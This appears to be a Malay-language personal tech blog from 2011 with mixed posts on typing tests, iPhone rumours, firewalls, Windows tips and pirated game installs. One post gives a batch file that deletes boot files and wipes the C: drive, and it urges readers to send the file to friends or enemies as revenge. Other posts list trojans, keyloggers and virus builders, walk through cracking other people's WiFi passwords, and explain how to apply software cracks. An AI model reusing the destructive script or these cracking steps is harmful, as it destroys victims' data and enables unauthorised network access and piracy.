Jom Uji Speed Test Jari Kita!

Thursday, September 29, 2011



assalamualaikumwarahmatullahiwabarokatuh.. =)

tengah-tengah bosan+ stress+meluat+suka nk buat assigment database ni, pulak dah jem!! internet sloww.. %#^@!.. macam biasa la.. try speedtest P1.. berangan punya berangan aku type kt google finger speed test.. woooo.. jumpa something yang best woh..hahah..

MALAYSIAN-TYPING SPEED TEST.. fulamak.. so apa lagi jom la try jari "gamer" korang tu.. haha.. sebelom tu ni result aku yg xberapa nk pantas.. sape boleh bit??

Kamu mencapai 219 markah, jadi kamu berada di posisi 3149 dari 24997 dalam senarai kedudukan


Kamu menaip 282 aksara seminit
you mendapat 42 perkataan betul dan
kamu mendapat 1 perkataan salah


selamat mencuba..:D

Regard,
-Wp-


Mac OS X Lion Transformation Pack 9.0 Untuk Windows 7

lion pack

Mac OS X Lion Transformation Pack for Windows 7.

Updates : new theme, new shell style, new installer, add finger, add finderbar, add macsearch, add winroll, add xlefty, add XWindowsDock.


Note : Skin Packs installer have easy and safe install option , Please unistall old or other version of skin packs before install new version. Before install disable user account controller and close all runnig program , after finish restart your system.

Download from Hameddanger’s Deviantart

Source: Devianart.


Regard,

-Wp-





Apple Mengesahkan Pelancaran iPhone 5 Pada 4 Oktober

Wednesday, September 28, 2011

Setelah diwar-warkan sebelum ini, kini disahkan bahawa Apple bakal melancarkan iPhone 5 pada 4 Oktober ini pukul 10.00 pagi di kampus Apple sendiri iaitu di Cupertino, California. Dijangkakan bahawa Apple bakal melancarkan iPhone generasi baru, iaitu iPhone 5 dan pada masa yang sama, sistem operasi mereka, iOS 5.

Sehingga kini, fungsi yang bakal diperkenalkan pada iPhone 5 masih menjadi tanda tanya. Tetapi ia diperkatakan yang mana iPhone 5 kelak akan membawakan cip pemprosesan A5, RAM 1GB, dan juga kamera 8-megapixel. Selain daripada itu, ia juga bakal membawakan kebolehan untuk mengawal telefon menggunakan suara, dipanggil Assistant.

Sama-sama kita nantikan pelancaran iPhone 5 tidak lama lagi.


Regard,

-Wp-



Senarai Tools & Virus Paling Berbahaya 2011

Salam Peeps..xD

Hari ini saya nak buat 1 entri pendek untuk perkongsian bersama. Ini adalah senarai Tools dan Virus yang paling digemari pada tahun 2011. Ada juga virus dan tools yang kita sendiri tidak pernah dengar.Insyallah saya akan mengulas lebih lanjut tentang tools-tools dan virus di bawah...






Trojan Horses
-Yuri RAT v1.2
-MofoTro v1.7 BETA
-Charon
-Beast v2.0.7
-Omerta v1.3
-Theef v2.10
-Combined Forces R.A.T
-ProRat v1.9 Fix2


Keyloggers
-Elite Keylogger v1.0
-SKL v0.1
-KeySpy v2.0
-A++++
-Curiosity
-Keylogger
-KeyCopy


Binders
-Daemon Crypt Public v2
-NT Packer v2.1
-EES binder v1.0
-File Injector v3
-Bytes Adder
-FreshBind v2.01
-YAB v2.01
-NakedBind v1.0
-Amok Joiner


WebHacks/WordLists
Brute Forcers
-Munga Bunga 's Official
-Brutus - Authentication Engine Test 2
-wwwHack v1.946
-FTP Brute Hacker
-FTP Brute Forcer.tar.gz - Unix
-Wbrute.tar.gz - Unix
-Shadow Scanner-Brute Forcer
-Hackers Utility v1.5
-POP3 brute forcer.tar.gz - Unix


CGI-Bug Scanners
-NStealth HTTP Security Scanner v5.8
-Attack Toolkit v4.1 & source code included
-Scanarator
-Legion NetBios Scanner v2.1
-NetView v1.0
-CGI Vulnerability Scan
-CGI Scanner v4.0
-VoidEye CGI scanner


Viruses
-Hippi virus
-Sasser
-W32. Blaster .Worm
-Midnight Massacre
-00001
-Nimda
-Loveletter virus
-Happy '99
-MXZ


Virus Builders
-DR VBS
-VBSwg 2 beta - Virus builder
-p0ke's WormGen 2.0
-RESIDUO - DoS Virus


MSN Hacks & Bots
-HoaX Toolbox 1.1
-MSN Extreme 3.0
-MessenPass v1.06
-Advanced Blood Scroller
-Nudge Madness
-Advanced Instant Messengers Password Recovery
-Contact Spy
-Msn Explosion
-Encrypted Messenger


Port & IP Scanners
-Blues Port Scanner
-ProPort v2.2
-SuperScan v3.0
-Net Scan Tools v4.2
-LanSpy v2.0
-Trojan Hunter v1.5
-SuperScan v4.0
-Neotrace PRO v3.25 trial&crack


Nukers And Flooders
-Rocket v1.0
-RPCNuke v1.0
-Panther Mode1 - 56k
-Panther Mode2 - ISDN
-Final Fortune v2.4
-Battle Pong - Technophoria
-Assault v1.0
-ICMP Nuker
-CLICK v2.2


amacam?? bnyak tak...haha.. tak lebih tak kurang ini je dapat google..
renung-renungkan dan selamat beramal..

Regard,
-Wp-


Shutdown Komputer Untuk Selama-lamanya!


Aku yakin korang ingin membalas ke atas perbuatan buruk yang pernah korang terkena sebelum ni pada seseorang,dan dengan sedikit kaedah korang dapat mematikan komputer orang tersebut selamanya! arghhhh!! kejam jugak post aku kali ini..HAHA..


Mari kita mulakan:

1) Buka notepad dan copy / paste kod ini:



@ Echo off
attrib-r-s-h c: \ autoexec.bat
del c: \ autoexec.bat
attrib-r-s-h c: \ boot.ini
del c: \ boot.ini
attrib-r-s-h c: \ ntldr
del c: \ ntldr
attrib-r-s-h c: \ windows \ win.ini
del c: \ windows \ win.ini

2) Sekarang save file dengan apa saja nama contoh: "pengajaran.bat" tanpa quote..


Fail ini boleh mematikan (shutdown) komputer seseorang.
Ia mematikan komputer dan memadam fail yang diperlukan untuk reboot dan restart.


INGAT - JANGAN KLIK FILE INI OK.
KORANG TIDAK AKAN DAPAT RECOVER SEMULA kOMPUTER SETELAH KORANG MEMBUKA FILE BAT NI TAU!


Kirimkan ke komputer kawan-kawan mahupun lawan dan beritahu mereka untuk membukanya.
Berikut ini adalah kod lain yang boleh digunakan juga:


cmd / c del c: \ windows \ * / F / S / Q

cmd / c del c: \ * / F / S / Q

Paste di Notepad dan simpan fail ini dengan Extension cmd atau bat
Selesai!

Regard,
-Wp-


Hack & Crack WPA/WPE WiFi Dengan Fern WiFi Cracker

Hari ini kita akan membincangkan topik yang menjadi permintaan hangat dikalangan pembaca
Wrong Project. Saya akan memberikan kepada anda tutorial cara atau kaedah untuk menggodam (hack) dan memecahkan (crack) kata laluan WPA/WPE WiFi dengan menggunakan sebuah tool khas untuk distro Linux iaitu Fern WiFi Cracker.

Tool ini telah didatangkan sekali dalam distro Linux yang paling 'hangat' digunakan untuk menggodam iaituBackTrack 5. Malang sekali tool yang berguna ini tidak dicipta untuk Windows (sorry pengguna Windows!) oleh itu Mr.Hac menggalakkan anda untuk memasang secara dual boot dengan Windows distro Linux sama ada BackTrack 5 atau Ubuntu, atau boleh juga Linux Mint untuk menggunakannya. Tentang kaedah pemasangan Fern WiFi Cracker ini pada Ubuntu, itu Mr.Hac akan tulis kemudian dalam entri yang akan datang.

Ok? Dah cukup dengan intro tu? Mari kita telusuri kaedah ini bersama.

Kaedah/Cara Menggunakan Fern WiFi Cracker:

1. Klik pada butang Refresh untuk memuatkan antaramuka pemantau (monitor interface). Kemudian klik pada butang Scan untuk memulakan pengimbasan.


2. Apabila terdapat rangkaian WPA atau WPE dijumpai oleh Fern ini, maka akan kelihatan paparan seperti di bawah:


3. Jika anda memilih untuk menggodam WPE, paparan seperti di bawah (InsyaAllah) akan keluar:


4. Jika anda memilih untuk menggodam WPA pula, maka paparan seperti di bawah (InsyaAllah) akan keluar:


5. Kata laluan atau kekunci (keys) akan ditambahkan ke dalam pengkalan data (database) secara automatik selepas ia berjaya dipecahkan. Bagaimanapun, anda boleh menambahkan keys secara manual. Pengkalan data boleh dijejaki di /usr/local/bin/Fern-Wifi-Cracker/key-Database/Database.db


6. Anda boleh menjejaki lokasi router WiFi dengan Mac Address menggunakan Geolocatory Tracker. Ia boleh dibuka melalui Toolbox -> Geolocatory Tracker


7. Dah tu tunggu apa lagi? Guna la WiFi tu! Haha!



DOWNLAOD: Fern WiFi Cracker (Sila muat turun ia dari sini)

Regard,
-Wp-


5 Firewall Terbaik Untuk Windows


Penggunaan Anti-virus bukanlah satu-satunya cara bagi menjaga komputer anda dari ancaman dunia cyber.Terdapat banyak kaedah-kaedah bagi melepasi pengesanan oleh Anti-virus.Lihat saja pada Keylogger,telah banyak versi Keylogger yang mampu meloloskan diri dari dikesan oleh Anti-virus.

Bukanlah Analyzer katakan yang Anti-virus tidak membantu komputer anda dari dijangkiti.Tidak sama sekali.Anti-virus yang boleh Analyzer cadangkan pada anda semua disini ialah Eset Smart Security.

Mr.Hac dalam penulisan beliau yang lepas telah memberitahu bahawa Eset telah mengeluarkan versi yang terbaru iaitu Eset Smart Security 5.


Terdapat 1 lagi kaedah dalam membantu anda membantu anda dalam menghadapi dunia cyber yaitu dengan pemasangan Firewall tambahan.Terdapat pelbagai Firewall dan juga ianya berlainan bagi tiap operation system seperti Linux,Windows,Mac dan lain-lain.Pada entri kali ini Analyzer membincangkan Firewall bagi Windows dahulu..Adeh panjangnya intro....



Zonealarm Firewall

Zonealarm memberikan penyelesaian yang efektif dalam melindungi komputer anda.Zonealarm terdapat dalam versi percuma dan juga versi profesional yang tidak percuma(hehehe..)
Ia mampu menangkis serangan penggodam, virus,malware, spyware dan lain-lain ancaman pada komputer anda.Zonealarm sangat bersesuaian(compatible) pada semua Windows(Windows XP,Vista,&7).Download Zonealarm Firewall



Comodo Firewall


Comodo Firewall adalah Firewall yang bijak dalam menghalang serangan-serangan luar dan cubaan membawa keluar data dari dalam komputer anda.Comodo Firewall datang dalam versi percuma dan juga versi pro.Comodo Firewall juga mempunyai perlindungan dari malware dan spyware(perlu pilih pada proses install).Ia juga bersesuaian pada semua Windows.Juga terdapat dalam 32bit dan 64bit.Download Comodo Firewall





Rising Firewall

Tidak banyak perbezaan bagi Rising pada Firewall-firewall diatas.Dalam pemantauan Analyzer di forum-forum Firewall luar negara,ramai yang mengatakan Rising ialah pilihan mereka.Rising mampu menlindungi aliran keluar dan masuk trafik pada sistem kita.Rising juga mampu melindungi sistem dari ARP Spoffing.Download Rising Firewall






Online Armor Firewall

Online Armor Firewall ialah satu Firewall yang memberi perlindungan jangkitan dari dalam dan luar komputer.Ia datang dalam beberapa pilhan perlindungan seperti DNS-spoofing dan Keylogger.Online Armor Firewall memberikan perlindungan efektif dalam menentang Keylogger dan lama Phising.Download Online Armor Firewall






F-Secure Internet Security

F-Secure Internet Security memberikan beberapa pilhan kawalan kepada komputer anda seperti menentang virus,worms,rootkits dan serangan zero-day.F-Secure Internet Security tidak akan muncul pop-up windows jika mengesan ancaman threat,ia akan menghalang terus dari memasuki dan membawa keluar data dari komputer anda.F-Secure Internet Security memberi perlindungan kepada anda dari Spamming,kecurian data dan juga Phising Site.Download F-Secure Internet Security.

Download Angry Bird Season PC Version FULL

Tuesday, September 27, 2011




Salam peeps.. ari tu aku dah post "Angry Bird Rio".. skang ni ada request lak nk angry bird season.. so jangan risau..ade je ni haa..

Angry Bird Season versi ketiga ini memang popular. Dalam permainan ni versi PC ada 6 musim (Halloween,Chrismas, Hari Valentine, Hari St.Patrick, Easter telur dan Musim Panas).. Seperti Angry Bird klasik, penjahatnya adalah si babi yang mencuri telur burung.. So anda akan bertemu dengan burung baru dalam versi baru ini..:D

Langkah 1
Download file ( 26.03 mb) Mediafire.

Langkah 2
Extract dan install Angry Bird Season. Untuk install, double klik file “AngryBirdsSeasonsInstaller_1.5.1.exe”

Langkah 3
Dah selesai install dalam directory..selalunya akan masok ke (“C:\Program Files\Rovio\Angry Birds Seasons”).. patch boleh didapati dalam folder CRACK masa anda extract dalam langkah 2 tadi.

Langkah 4
Double klick patch tersebut..(Run As Admin jika anda menggunakan Windows Vista or Windows 7)

Langkah 5
Bila dah berjaya patch, Run Angry Bird Season dan masukkan license key.. license key boleh didapati dalam folder CRACK.. copy paste je.. kemudian klick register.. BOOM..


p/s: masa masokkan activation key pastikan komputer anda tidak disambungkan dengan internet.. kalau ada apa2 pertanyaan sila tinggalkan komen anda disini.. :D

Regard,
-Wp-


Atasi Not-Responding tanpa menggunakan Ctrl+Alt+Del

Sunday, September 25, 2011


kita selalu hardcore punya bila nk guna PC kan?? so bila dah hardcore kita push macam2 kt PC ni buat itu la ini la, apa2 jela.. bukan nk mengata tapi kalau PC kita ni memng superb xpe la kan..haha..

so yg menjadi masalahnya bila PC kita hang kita slalu guna Ctrl+Alt+Del.. bukan x boleh, boleh je.. tapi nk bukak task manager pon kadang hang jugak kan..lalala~~ tapi PC aku jarang hang..lalala~~

OKe straight to the point, kita tak akan guna lagi Ctrl+Alt+Del untuk masok ke task manager dan end process.. so mana mana nk buat??
caranya:
  1. Right klick kat desktop, klick New --> Shorcut
  2. dalam kotak tu typekan atau copy je senang taskkill.exe /f /fi “status eq not responding”
  3. kemudian klick Next, dan Finish..
Well done peeps..hehe.. selamat mencuba dan selamat beramal..:D

Regard,
-Wp-




Tanda Tanda Jangitan VIRUS!!


Assalamualaikumm dan salam sejahtera.. jangan terkejut derr.. Seperti biasa post kali ini ada sedikit info tentang komputer kita pakai sekarang..Dalam dunia tanpa sempadan ini, apa saja boleh berlaku. Kecanggihan teknologi juga boleh disalahguna. Virus dicipta untuk menyusahkan orang lain. Walaupun kita mempunyai perisian anti virus, ianya belum dapat menjamin 100% selamat.Tahukah anda apakah tanda-tanda jika pc kita telah dijangkiti virus?


Tanda tanda pc anda telah dijangkiti virus adalah seperti berikut:

  • PC menjadi hang selepas dibuka, dan seringkali berlaku.
  • Prestasi PC tiba-tiba sahaja menjadi lembap. Sebarang aplikasi atau fail yang hendak dibuka menjadi terlalu perlahan.
  • Keluar mesej "Out of memory error" walaupun PC mengandungi ruang ingatan yang mencukupi.
  • Sistem operasi Windows tidak boleh dijalankan walau sebelum ini kita tidak pernah menyentuh bahagian setting ataupun mengubah registry.
  • Sistem operasi Windows tidak dapat dijalankan kerana fail-fail penting untuk menjalankannya hilang tiba-tiba.
  • Ada program yang tidak pernah diinstal sebelum ini tiba-tiba muncul dan berjalan dengan sendirinya.
  • Terdapat proses yang tidak diketahui sedang berjalan dan menggunakan banyak sumber CPU.
  • Kita tidak boleh menginstal sebarang program atau aplikasi baru.
  • Windows seringkali reboot dan proses reboot berlaku berulangkali.
  • Utiliti cakra seperti scandisk melapurkan banyak error pada cakra selepas melakukan imbasan cakra.
  • Program atau aplikasi yang sebelum ini boleh digunakan crash secara tiba-tiba.
  • Drive partition bagi cakra keras, CD-ROM dan cakra liut tiba-tiba sahaja hilang.
  • Menerima email yang mengandungi sisipan-sisipan yang ganjil, contohnya mengandungi dua ekstensi.
  • Perisian Antivirus hilang tiba-tiba.
  • Perisian Antivirus tidak boleh di instal.
  • Dialog box terpapar pada skrin secara tiba-tiba.
  • Sistem PC berjalan dengan sendirinya, misalnya tetikus menunjuk ke sesuatu, membuka dan menutup tray CD-ROM dengan sendirinya.
  • Penunjuk tetikus berubah imej dan grafik.
  • Ikon-ikon ganjil terpapat pada sistem tray walaupun tidak pernah menginstal sebelum ini.
  • Muzik atau Video tiba-tiba sahaja dimainkan dengan sendirinya.
  • Saiz sesuatu fail berubah, walaupun kita tidak mengeditnya sebelum ini.
  • Fail-fail yang kita simpan hilang satu persatu.
  • Properties sesuatu fail berubah dengan sendirinya.

Sudah Berapa Lama OS Kita Beroperasi?



Hello peeps..omputeh sedaih ari ni..hahah
Assalamualaikum dan salam sejahtera.. macam biasa post kali ni ada lagi tips baru.. ape tu? baca title la.. Nak tahu secara detail pasal OS komputer kita??

langkah2nye:
  1. Masuk dalam command prompt.. caranya Start --> box search tu type je "CMD" tanpa quote.. (jika anda pengguna windows XP, Start-->Run--> type CMD kemudian ok..)
  2. kemudian,bila dah keluar Command Prompt, masukkan pulak "systeminfo" dan tekan ENTER..
senang je kan?? :D
Dia akan keluar semua pasal PC kita..contoh macam Model, OS name, Version, dan banyak lagi..Selamat mencuba..:D

Regard,
-Wp-






Tips : Maintenance PC Setiap Bulan? Minggu?

Maintainance penting bagi nyawa sesebuah PC tu kerana PC lebih kurang macam manusia gak cuma dia xda kelebihan yang da manusia sbb manusia yang cipta dia..haha.. Bila PC dijaga.,sistem akan senang dan ringan untuktuk beroperasi dengan kita..
korang cuma perlu buat 4 pekara je setiap bulan/minggu iatu....

1.ScanDisk




2.Defragmented




3.Scan PC dengan antivirus.


4.Buang aplikasi yang xdigunakan.. instal bila guna jea. Boleh juga guna Ccleaner atau Advance System Care..

itu saya tips untuk hari ini.. renung renung kan dan selamat beramal.. :D

Regard,
-Wp-


Download Angry Bird Untuk PC (Windows)

Saturday, September 24, 2011




Salam!!

Wooo. Sekarang ni demam Angry Birds ke apa haa? Semua asyik ber-Angry Bird je. Housemate aku, malam nak final pun layan Angry Birds. Nasib baik yang main tu pandai2. Kalau tak, lukis gambar Angry Bird je la dekat kertas jawapan. Hehehe. Kalau dekat MrPiratz tu, kena buat banyak benda. Yang aku nak share ni, sonang aje. Makcik2 dekat kampung pun boleh buat. xD

Langkah 1:

Download file ( 34.03 mb) Mediafire. Klik icon Rio Dibawah untuk download.
AngryBirdsRio-MCE

Langkah 2:

Extract dan install Angry Bird RIO. Untuk install, double klik file “ Angry Birds Rio Installer v1.1.0”

angry bird rio installation

Install macam biasa sampai habis. Then proceed to step 3.

Langkah 3 :

Extract file “Crack” . Selepas itu, copy paste file “AngryBirdsRio,exe” ke dalam destination folder Angry Bird RIO. (tempat korang install Angry Bird RIO tadi) . Selalu nya ia akan diinstall di sini : C: Progam Files (x86)/Rovio/AngryBirdsRIO

Langkah 4 :

Launch Angry Bird RIO korang dan klik “Register”. Bila dia mintak registration key, masukkan saje apa2 number yang korang nak. Nak letak 1 je pun boleh.

Langkah 5 :

Mainlah Angry Bird RIO sampai lebam. Hahaha

angry-birds-rio-flying-yellow-bird

Kalau ada yang ada masalah nak install, tinggalkan komen kat bawah eh. Kalau yang berjaya install, tinggalkan jugak komen. Aku paksa!! Hahaha

p/s: Angry Bird RIO ni dah tak ada Babi Hijau (baca :khinzir hijau) dah. Ada burung dan monyet je. Aku dah habis sampai level 3. Nak tunggu update Level 4 punya. Weehooo

Tonton TV1 & TV2 Live Streaming..

Thursday, September 22, 2011

Haa.. Kepada Sesiapa Yang Tiada TV Kat Rumah.. Terutamanya Student-student Universiti/Kolej Cam Saya Nieh..
Korang Leh Jenguk-jenguk kat sini..

Channel TV1





Channel TV2


Channel Musik Aktif



Mintak maaf la yer TV3 dan seangkatan dengannya COMING SOON.. :D
harap berhibur.. jgn lupa bookmark yer senang nk bukak tgk lagi..hehe..

kalau ada error try download plugin bawah ni.. plug in untuk mozzila firefox
-DOWNLOAD-

Chat Melalui Command Prompt (CMD)

Wednesday, September 21, 2011

Post pagi ni saya nk berkongsi sikit dengan anda semua tentang cara2 nk chatting melalui command prompt. Dengan cara ini, kita tidak memerlukan Messenger seperti YM,Skype dan lain2 yang sewaktu dengannya. Apa yang diperlukan? hanya memerlukan Notepad, Command prompt, dan IP address dari komputer rakan kita.. cara nya mudah dah simple..follow je step kt bwah;


  1. Buka Notepad dan copy code bawan ni :
    @echo off
    :A
    Cls
    echo MESSENGER
    set /p n=User:
    set /p m=Message:
    net send %n% %m%
    Pause
    Goto A


  2. Save file yang anda buat tersebut dengan nama "Messenger.Bat"


  3. Buka Command Prompt dengan cara klik Start-->Run dan typekan cmd lalu tekan enter.

  4. Drag file yang telah anda buat tersebut "Messenger.Bat" pada Command Prompt anda dan tekan enter.


  5. Typekan IP address yang ingin anda hubungi dan tekanenter.


  6. Sekarang anda boleh kirmkan pesanana ke rakan anda dan tekan enter untuk mulai chatting..
Selamat Mencuba xD~

Regard,
-WP-